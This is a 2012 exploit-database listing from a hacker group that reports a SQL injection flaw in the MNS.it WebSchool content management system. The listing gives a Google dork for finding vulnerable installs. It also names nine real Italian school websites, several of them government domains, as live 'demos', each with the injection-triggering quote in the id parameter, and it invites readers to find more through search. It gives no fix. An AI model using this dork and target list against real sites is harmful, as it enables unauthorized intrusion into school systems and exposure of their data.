MNS.it SQL Injection

2012-09-10T00:00:00
ID PACKETSTORM:116419
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2012-09-10T00:00:00

Description

                                        
                                            `1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm TUNISIAN CYBER member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
[+] Author: TUNISIAN CYBER  
[+] Home: 1337day.com Inj3ct0r Exploit DataBase  
[+] Exploit Title: MNS SQL Injection Vulnerability  
[+] Date: 10-09-2012  
[+] Category: WebApp  
[+] Google Dork: intext:"by MNS.it - WebSchool e' un prodotto dinamico e multiutente , per informazioni contatta MNS - MEDIA & NET SERVICE"  
inurl:"/webschool3/page.php?id="  
  
[+] Tested on: Windows 7 Professionnel / Windows XP SP3 EN  
[+] Vendor: http://mns.it/  
  
  
########################################################################################  
  
Proof:  
127.0.0.1/page.php?id=[number]  
  
  
Demos:  
http://www.itcpantaleo.gov.it/webschool3/page.php?id=26'  
http://www.donmilaninapoli.gov.it/webschool3/page.php?id=2'  
http://www.liceovittorioimbriani.it/webschool3/page.php?id=10024'  
http://www.22ddalbertomario.gov.it/webschool3/page.php?id=4'  
http://www.icsmoscati.it/page.php?id=82'  
http://www.borsiprotagiurleo.gov.it/webschool/page.php?id=10005'  
http://www.icfdicapua.it/webschool3/page.php?id=15'  
http://www.cavaprimocircolo.gov.it/wsc/page.php?id=19'  
http://www.primocircolovico.gov.it/webschool3/page.php?id=1041'  
  
More in Google =)  
########################################################################################  
Greets to: TN H4CK3RZ , r00tw0rm members and Inj3ct0r Team  
###########################################################################################  
`